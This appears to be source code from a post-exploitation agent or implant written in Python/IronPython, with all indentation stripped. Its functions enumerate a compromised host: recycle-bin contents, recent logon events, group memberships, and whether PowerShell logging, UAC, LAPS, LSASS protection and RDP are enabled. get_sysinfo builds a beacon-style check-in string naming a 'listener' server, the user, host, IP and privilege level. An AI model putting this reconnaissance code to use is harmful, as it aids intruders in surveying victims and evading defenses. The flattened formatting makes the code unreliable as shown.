def recycleBin():
summary = printHeader("RECYCLE BIN")
if WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator):
for drive in DriveInfo.GetDrives():
try:
recycleDir = DirectoryInfo(drive.Name + "$Recycle.Bin\\")
for dir in DirectoryInfo.EnumerateDirectories(recycleDir):
fileList = DirectoryInfo.GetFiles(dir)
summary += printSubheader("Directory: {0}".format(dir.FullName))
for file in fileList:
name = file.FullName.split("\\")[-1]
if name.startswith("$I"):
info = open(file.FullName, "r").read()
summary += "{0}\t{1}\n".format(name.replace("$I", "$R"), info[26::2])
except IOError:
pass
else:
for drive in DriveInfo.GetDrives():
try:
recycleDir = drive.Name + "$Recycle.Bin\\"
user = WindowsIdentity.GetCurrent()
fileList = Directory.GetFiles(recycleDir + user.Owner.ToString())
summary += printSubheader("Directory: {0}".format(recycleDir + user.Owner.ToString()))
for file in fileList:
name = file.split("\\")[-1]
if name.startswith("$I"):
info = open(file, "r").read()
summary += "{0}\t{1}\n".format(name.replace("$I", "$R"), info[26::2])
except IOError:
pass
return summary
def systemInfo():
verInfo = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
psKey = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine"
sysPolKey = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System"
sysSummary = printHeader("SYSTEM INFORMATION")
sysSummary += "{0:<10}: {1}\n".format("Host", Env.MachineName)
sysSummary += "{0:<10}: {1} {2}\n".format("OS", Registry.GetValue(verInfo, "ProductName", "Windows"), Diagnostics.FileVersionInfo.GetVersionInfo(Env.SystemDirectory + "\\kernel32.dll").ProductVersion)
sysSummary += "{0:<10}: {1}\n".format("64-Bit", Env.Is64BitOperatingSystem)
sysSummary += "{0:<10}: {1}\n".format("Date", DateTime.Now.ToString())
sysSummary += "{0:<10}: {1}\n\n".format("Uptime", DateTimeOffset(DateTime.Now).AddMilliseconds(-Env.TickCount).LocalDateTime)
sysSummary += "{0:<14}: {1}\{2}\n".format("Username", Env.UserDomainName, Env.UserName)
sysSummary += "{0:<14}: {1}\n\n".format("Logon Server", Env.GetEnvironmentVariable("LOGONSERVER"))
sysSummary += "{0:<22}: {1}\n".format("PowerShell Version", Registry.GetValue(psKey, "PowerShellVersion", "N/A - Likely 2.0"))
sysSummary += "{0:<22}: {1}\n".format("PowerShell Compat", Registry.GetValue(psKey, "PSCompatibleVersion", "N/A - Likely 1.0, 2.0"))
sysSummary += "{0:<22}: {1}\n".format("PS Script Block Log", Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging", "EnableScriptBlockLogging", "N/A"))
sysSummary += "{0:<22}: {1}\n".format("PS Transcription", Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription", "EnableTranscripting", "N/A"))
sysSummary += "{0:<22}: {1}\n".format("PS Transcription Dir", Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription", "OutputDirectory", "N/A"))
sysSummary += "{0:<22}: {1}\n\n".format("PS Module Logging", Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging", "EnableModuleLogging", "N/A"))
sysSummary += "{0:<27}: {1}\n".format("UAC Enabled", Convert.ToBoolean(Registry.GetValue(sysPolKey, "EnableLUA", "N/A")))
sysSummary += "{0:<27}: {1}\n".format("High Integrity", WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator))
sysSummary += "{0:<27}: {1}\n".format("UAC Token Filter Disabled", Registry.GetValue(sysPolKey, "LocalAccount", False))
sysSummary += "{0:<27}: {1}\n".format("UAC Admin Filter Enabled", Registry.GetValue(sysPolKey, "FilterAdministratorToken", False))
sysSummary += "{0:<27}: {1}\n".format("Local Admin Pass Solution", Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft Services\AdmPwd", "AdmPwdEnabled", "N/A"))
sysSummary += "{0:<27}: {1}\n".format("LSASS Protection", Registry.GetValue("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa", "RunAsPPL", "N/A"))
sysSummary += "{0:<27}: {1}\n".format("Deny RDP Connections", Convert.ToBoolean(Registry.GetValue("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server", "FDenyTSConnections", "N/A")))
return sysSummary
def userGroups():
iden = WindowsIdentity.GetCurrent()
userSummary = printHeader("USER GROUPS")
for sid in iden.Groups:
userSummary += "{0:<35}: {1}\n".format(SecurityIdentifier(sid.ToString()).Translate(NTAccount), sid)
return userSummary
def logonEvents():
summary = printHeader("LOGON EVENTS")
if WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator):
sec = EventLog("Security")
logons = [event for event in sec.Entries if event.InstanceId == 4624]
for logon in logons[:10]:
idx = logon.Message.IndexOf("This event is generated")
message = logon.Message.Remove(idx)
summary += printSubheader("Time Created: {0}".format(logon.TimeGenerated.ToString()))
summary += message
return summary
else:
return summary + "\nNot administrator!\n"
def is_high_integrity(self):
identity = WindowsIdentity.GetCurrent()
principal = WindowsPrincipal(identity)
return principal.IsInRole(WindowsBuiltInRole.Administrator)
def get_sysinfo(nonce='00000000'):
# NOTE: requires global variable "server" to be set
# nonce | listener | domainname | username | hostname | internal_ip | os_details | os_details | high_integrity | process_name | process_id | language | language_version | architecture
__FAILED_FUNCTION = '[FAILED QUERY]'
try:
if platform.python_implementation() == 'IronPython':
username = Environment.UserName
else:
username = pwd.getpwuid(os.getuid())[0].strip("\\")
except Exception as e:
username = __FAILED_FUNCTION
try:
if platform.python_implementation() == 'IronPython':
uid = WindowsIdentity.GetCurrent().User.ToByteArray()
else:
uid = os.popen('id -u').read().strip()
except Exception as e:
uid = __FAILED_FUNCTION
try:
if platform.python_implementation() == 'IronPython':
highIntegrity = WindowsPrincipal(
WindowsIdentity.GetCurrent()).IsInRole(
WindowsBuiltInRole.Administrator)
else:
highIntegrity = "True" if (uid == "0") else False
except Exception as e:
highIntegrity = __FAILED_FUNCTION
try:
if platform.python_implementation() != 'IronPython':
osDetails = os.uname()
except Exception as e:
osDetails = __FAILED_FUNCTION
try:
if platform.python_implementation() == 'IronPython':
hostname = Environment.MachineName
else:
hostname = osDetails[1]
except Exception as e:
hostname = __FAILED_FUNCTION
try:
internalIP = socket.gethostbyname(socket.gethostname())
except Exception as e:
try:
internalIP = os.popen(
"ifconfig|grep inet|grep inet6 -v|grep -v 127.0.0.1|cut -d' ' -f2"
).read()
except Exception as e1:
internalIP = __FAILED_FUNCTION
try:
if platform.python_implementation() == 'IronPython':
osDetails = Environment.OSVersion.ToByteArray()
else:
osDetails = ",".join(osDetails)
except Exception as e:
osDetails = __FAILED_FUNCTION
try:
if platform.python_implementation() == 'IronPython':
processID = Process.GetCurrentProcess().Id
else:
processID = os.getpid()
except Exception as e:
processID = __FAILED_FUNCTION
try:
temp = sys.version_info
pyVersion = "%s.%s" % (temp[0], temp[1])
except Exception as e:
pyVersion = __FAILED_FUNCTION
try:
architecture = platform.machine()
except Exception as e:
architecture = __FAILED_FUNCTION
if platform.python_implementation() == 'IronPython':
language = 'ironpython'
processName = Process.GetCurrentProcess()
else:
language = 'python'
cmd = 'ps %s' % (os.getpid())
ps = subprocess.Popen(cmd,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = ps.communicate()
parts = out.split(b"\n")
if len(parts) > 2:
processName = b" ".join(parts[1].split()[4:]).decode('UTF-8')
else:
processName = 'python'
return "%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s" % (
nonce, server, '', username, hostname, internalIP, osDetails,
highIntegrity, processName, processID, language, pyVersion,
architecture)
def IsHighIntegrity():
identity = WindowsIdentity.GetCurrent()
principal = WindowsPrincipal(identity)
return principal.IsInRole(WindowsBuiltInRole.Administrator)